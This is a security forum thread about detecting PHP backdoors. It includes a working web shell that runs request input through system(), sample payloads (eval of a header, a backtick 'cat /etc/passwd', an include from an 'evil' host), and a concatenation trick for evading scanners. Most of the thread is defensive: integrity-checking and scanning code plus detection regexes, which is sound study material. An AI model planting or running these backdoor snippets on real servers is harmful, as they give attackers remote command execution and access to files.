Sla.ckers.org
Whether this is about ha.ckers.org, sla.ckers.org or some other project you are interested in or want to talk about, throw it in here to get feedback. 
Any project to detect php backdoor?
Posted by: hookits
Date: September 08, 2009 04:50AM

Hey, guys!

I want to create a project to detect the php backdoor, and I found a very easy example of php backdoor is (by http://michaeldaw.org):
<?php

if(isset($_REQUEST['cmd'])){
    echo "<pre>";
    $cmd = ($_REQUEST['cmd']);
    system($cmd);   // runs whatever arrives in ?cmd= and echoes its output
    echo "</pre>";
    die;
}

?>

Usage: hxxp://target.com/simple-backdoor.php?cmd=cat+/etc/passwd

So we should write a python/perl script to scan every file in the directory and find if there is a "system" in it?

Besides "system", I think there should be some more commands we should concentrate on, for example "exec".

However, I don't have a full list of the dangerous commands, waiting for your advice:p



Edited 1 time(s). Last edit at 09/08/2009 04:51AM by hookits.

Re: Any project to detect php backdoor?
Posted by: barbarianbob
Date: September 08, 2009 08:27AM

/exec|system|eval|`|dl|passthru|{\s*\$\s*{.*}\s*}|include|require/i

is what I would start off with.
But you may want to omit include/require.

examples:
eval($_SERVER['HTTP_EVIL']);
`cat /etc/passwd`;
$a='php'.'info';$z="{${$a()}}";
include 'http://evil/...';

Re: Any project to detect php backdoor?
Posted by: rsnake
Date: September 11, 2009 11:47AM

Code obfuscation is the very next thing they'll do if they know this is how they're being detected. But it'll probably work well for a while.

- RSnake
Gotta love it. http://ha.ckers.org

Re: Any project to detect php backdoor?
Posted by: rvdh
Date: September 12, 2009 08:57AM

chroot jail + php safe_mode on older versions of PHP. But php safe_mode can be bypassed in some situations, don't rely on it ALONE. Further, disable PHP modules you never use, like fopen for example. Pretty much depends on what you allow or disallow.

To find it, just use your terminal find commands. Or try a program that shows the file diffs e.g. changes made to the file system after a certain point. (like aide IDS does).

Re: Any project to detect php backdoor?
Posted by: rvdh
Date: September 12, 2009 09:15AM

Or try mine, maybe you can use it for some inspiration. It generates hashes from files and compares them, run through a crontab. Pretty basic, but you get the idea.



<?php

/*

ZEROSUM - Automated File Integrity Bot.

Copyright (C) 2008 rvdh.ath.cx

This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY;
without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see http://www.gnu.org/licenses/


TABLE STRUCTURE

CREATE TABLE `zerosum` (
	`id` int(11) NOT NULL auto_increment,
	`filename` varchar(255) NOT NULL default '',
	`permhash` varchar(40) NOT NULL default '',
	`filehash` varchar(40) NOT NULL default '',
	PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO_INCREMENT=1 ;


CRONTAB


lynx -dump "http://www.example.com/zerosum.php" >/dev/null 2>&1

or

/usr/bin/php -q /home/public_html/zerosum.php


*/


# Store this below the /www/ folder!

# Note: this uses the legacy mysql_* extension (PHP 5 era). It was removed in
# PHP 7, where mysqli or PDO take its place.


$dbHost = "localhost";
$dbBase = "";
$dbUser = "";
$dbPass = "";


$dbLink = mysql_connect($dbHost, $dbUser, $dbPass) or die();
mysql_select_db($dbBase) or die();


function zerosum($dir){
    # Settings

    # update files after check, program does this already.
    $update_files = false;

    # indexing files
    $index_files = false;

    # send an alert mail
    $mailbatch  = true;

    # show batch onscreen
    $showbatch = false;

    $domain = 'example.com';

    $mailto  = 'YOU@example.com';

    $subject = 'Zerosums!';

    $hashes = array();

    $directory = dir($dir);

    # One record per file: path|mtime|size|perms. Note that the "filehash"
    # compared below is sha1() of the file SIZE, not of the contents, so a file
    # replaced by another of the same size is not flagged.
    while ($file = $directory->read()){
        if ($file != '.' && $file != '..') {
            $modified = date ("F d Y H:i:s", filemtime($dir.'/'.$file));
            $permission = substr(sprintf('%o', fileperms($dir.'/'.$file)), -4);
            $hashsum = filesize($dir.'/'.$file);
            array_push($hashes,htmlspecialchars($dir.'/'.$file,ENT_QUOTES,'UTF-8').'|'.$modified.'|'.$hashsum.'|'.$permission);
        }
    }
    $directory->close();
    if($showbatch) {
        echo '<p>Batchdate: '.date ("F d Y H:i:s").'</p>';
        $count = 0;
        foreach($hashes as $hash) {
            $tmp = explode('|',$hash);
            $sql = mysql_query("select * from zerosum where filename = '".$tmp[0]."'");
            if(mysql_num_rows($sql) > 0) {
                while($row = mysql_fetch_array($sql)) {
                    if($row['filehash'] != sha1($tmp[2])) {
                        # $tmp[2] is this file's size ($hashsum would be the last file's)
                        echo $row['filename'] . ' was altered on: ' . $tmp[1] . ' current permission: ' . $tmp[3] . ' size: ' . $tmp[2] . '<br>';
                        $count++;
                    }
                    if($row['permhash'] != sha1($tmp[3])) {
                        echo $row['filename'] . '\'s permission was altered to: ' . $tmp[3] . '<br>';
                        $count++;
                    }
                }
            }
            else {
                echo $tmp[0] . ' was deleted, or does not exist! <br>';
            }
            if($count > 0) {
                # index all files again.
                $update_files = true;
            }
        }
    }
    if($mailbatch) {
        if($mailto) {
            $message1 = 'Batchdate: '.date ("F d Y H:i:s").', ';
            $count1 = 0;
            foreach($hashes as $hash) {
                $tmp1 = explode('|',$hash);
                $sql1 = mysql_query("select * from zerosum where filename = '".$tmp1[0]."'");
                if(mysql_num_rows($sql1) > 0) {
                    while($row1 = mysql_fetch_array($sql1)) {
                        if($row1['filehash'] != sha1($tmp1[2])) {
                            $message1 .= $row1['filename'] . ' was altered on: ' . $tmp1[1] . ' current permission: ' . $tmp1[3] . ' size: ' . $tmp1[2] . ', ';
                            $count1++;
                        }
                        if($row1['permhash'] != sha1($tmp1[3])) {
                            $message1 .= $row1['filename'] . '\'s permission was altered to: ' . $tmp1[3] . ', ';
                            $count1++;
                        }
                    }
                }
                else {
                    echo $tmp1[0] . ' was deleted, or does not exist! <br>';
                }
            }
            if($count1 > 0) {
                # mail batch
                mail($mailto,$subject,$message1,"From: zerosum@".$domain);
                # index all files again.
                $update_files = true;
            }
        }
        else {
            echo 'Cannot email batch, e-mail is empty!';
            exit;
        }
    }
    if($update_files) {
        foreach($hashes as $hash) {
            $tmp = explode('|',$hash);
            $sql = mysql_query("update zerosum set filehash = '".sha1($tmp[2])."', permhash = '".sha1($tmp[3])."' where filename = '".$tmp[0]."'") or die();
        }
    }
    if($index_files) {
        # You must run this first, to Index all the files in the DIR!
        $empty = mysql_query("TRUNCATE TABLE `zerosum`") or die();
        foreach($hashes as $hash) {
            $tmp = explode('|',$hash);
            $sql = mysql_query("insert into zerosum set filename = '".$tmp[0]."', filehash = '".sha1($tmp[2])."', permhash = '".sha1($tmp[3])."'") or die();
        }
    }
    echo 'OK';
}


# Example call:

zerosum('tutorialstuff');


?>



Edited 1 time(s). Last edit at 09/12/2009 09:30AM by rvdh.

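The same baseline-and-compare idea as ZEROSUM, as an added example that is not rvdh's code: it hashes file contents with SHA-256 (rather than the file size) so a same-size replacement is caught too, keeps the baseline in a plain dict where ZEROSUM uses a MySQL table, and builds its demo directory itself.

```python
import hashlib
import os
import stat

def snapshot(root):
    """Map each regular file under root to (sha256 of contents, permission bits)."""
    snap = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if not stat.S_ISREG(st.st_mode):   # skip symlinks, sockets, etc.
                continue
            h = hashlib.sha256()
            with open(path, "rb") as fh:
                for chunk in iter(lambda: fh.read(65536), b""):
                    h.update(chunk)
            rel = os.path.relpath(path, root)
            snap[rel] = (h.hexdigest(), oct(stat.S_IMODE(st.st_mode)))
    return snap

def compare(baseline, current):
    """Return sorted (relpath, finding) pairs describing every difference."""
    findings = []
    for rel, (digest, perms) in baseline.items():
        if rel not in current:
            findings.append((rel, "deleted"))
            continue
        cur_digest, cur_perms = current[rel]
        if cur_digest != digest:
            findings.append((rel, "content altered"))
        if cur_perms != perms:
            findings.append((rel, f"permissions changed {perms} -> {cur_perms}"))
    for rel in current:
        if rel not in baseline:
            findings.append((rel, "new file"))   # a dropped file shows up here
    return sorted(findings)

if __name__ == "__main__":
    import tempfile
    # Constructed demo: take a baseline, then change one file and add another.
    with tempfile.TemporaryDirectory() as root:
        with open(os.path.join(root, "index.php"), "w") as fh:
            fh.write("<?php echo 'hello'; ?>\n")
        baseline = snapshot(root)           # in practice: persist this somewhere
        with open(os.path.join(root, "index.php"), "a") as fh:
            fh.write("// one appended line changes the digest\n")
        open(os.path.join(root, "upload.php"), "w").close()
        for rel, finding in compare(baseline, snapshot(root)):
            print(f"{rel}: {finding}")
```

Running the check from cron and mailing the findings is the part ZEROSUM already shows; the comparison above is the piece that changes.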
Re: Any project to detect php backdoor?
Posted by: rvdh
Date: September 12, 2009 09:46AM

Or, if you want to scan the source, here is a symbol list I composed. Note, this took a very long time to gather. I currently use this in a Firefox extension to scan source code.

http://rvdh.ath.cx/projects/symbols.txt

Re: Any project to detect php backdoor?
Posted by: Menztrual
Date: June 29, 2010 02:26AM

Doesn't stop someone from doing something like
<?php
$a ="sy";
$b = "ste";
$c = "m";

$func = $a.$b.$c;

$func("ls");

?>

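A scanner in the spirit of what hookits asked for, added here as an example rather than code from the thread: it starts from barbarianbob's regex (minus include/require, as he suggests, plus shell_exec, which I added) and adds two rules aimed at the evasion Menztrual shows, a function name assembled at runtime and called through a variable, and request superglobals feeding it. The rule names and the two embedded samples are my constructions.

```python
import os
import re

# Rules: barbarianbob's names (minus include/require, plus shell_exec), each
# tightened to a call site, plus rules for a variable used as a function name
# (Menztrual's $func("ls")) and for request input reaching the file at all.
RULES = [
    ("dangerous-call",
     re.compile(r"\b(exec|shell_exec|system|eval|dl|passthru)\s*\(", re.I)),
    ("backtick-exec", re.compile(r"`[^`\n]+`")),
    ("curly-var-func", re.compile(r"\{\s*\$\s*\{.*?\}\s*\}")),
    ("variable-call", re.compile(r"\$[A-Za-z_]\w*\s*\(")),
    ("request-input", re.compile(r"\$_(GET|POST|REQUEST|COOKIE|SERVER)\b")),
]

def scan_source(src):
    """Return (line_no, rule, matched_text) for every hit in one PHP source."""
    hits = []
    for no, line in enumerate(src.splitlines(), 1):
        for name, rx in RULES:
            for m in rx.finditer(line):
                hits.append((no, name, m.group(0)))
    return hits

def scan_tree(root, exts=(".php", ".phtml", ".inc")):
    """Walk root and return {path: hits} for every PHP-like file with hits."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for f in files:
            if f.lower().endswith(exts):
                path = os.path.join(dirpath, f)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_source(fh.read())
                if hits:
                    report[path] = hits
    return report

# Constructed samples: hookits' simple backdoor and Menztrual's concatenated
# variant, embedded so the block runs without reading the filesystem.
SIMPLE_BACKDOOR = ('<?php\nif(isset($_REQUEST["cmd"])){\n'
                   '  system($_REQUEST["cmd"]);\n}\n?>')
CONCAT_BACKDOOR = ('<?php\n$a ="sy"; $b = "ste"; $c = "m";\n'
                   '$func = $a.$b.$c;\n$func("ls");\n?>')

if __name__ == "__main__":
    for label, src in (("simple", SIMPLE_BACKDOOR), ("concat", CONCAT_BACKDOOR)):
        for no, rule, text in scan_source(src):
            print(f"{label}:{no}: {rule}: {text}")
```

The variable-call rule is noisy on legitimate code that uses callbacks, so treat hits as triage leads to read, not verdicts; as rsnake notes, further obfuscation will eventually sidestep any fixed pattern list.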